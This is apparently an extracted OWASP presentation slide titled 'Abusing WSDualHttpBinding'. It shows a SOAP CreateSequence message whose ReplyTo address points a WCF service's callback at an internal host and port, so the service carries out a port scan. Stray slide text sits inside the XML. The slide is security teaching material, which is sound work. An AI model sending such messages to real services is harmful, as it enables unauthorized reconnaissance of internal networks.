Abusing WSDualHttpBinding
Port scanning via WSDualHttpBinding callback
<s:Envelope xmlns:s="http://www.w3.org/2003/05/soap-envelope"
xmlns:a="http://www.w3.org/2005/08/addressing">
<s:Header>
<a:Action s:mustUnderstand="1">
http://schemas.xmlsoap.org/ws/2005/02/rm/CreateSequence
</a:Action>
OWASP
37
<a:ReplyTo>
<a:Address>http://holyfield-pc:135/test</a:Address>
</a:ReplyTo>
<a:To s:mustUnderstand="1">
http://gotham-vista:88/Service.svc
</a:To>
</s:Header>
<s:Body>
<CreateSequence xmlns="http://schemas.xmlsoap.org/ws/2005/02/rm">
</CreateSequence>
</s:Body>
</s:Envelope>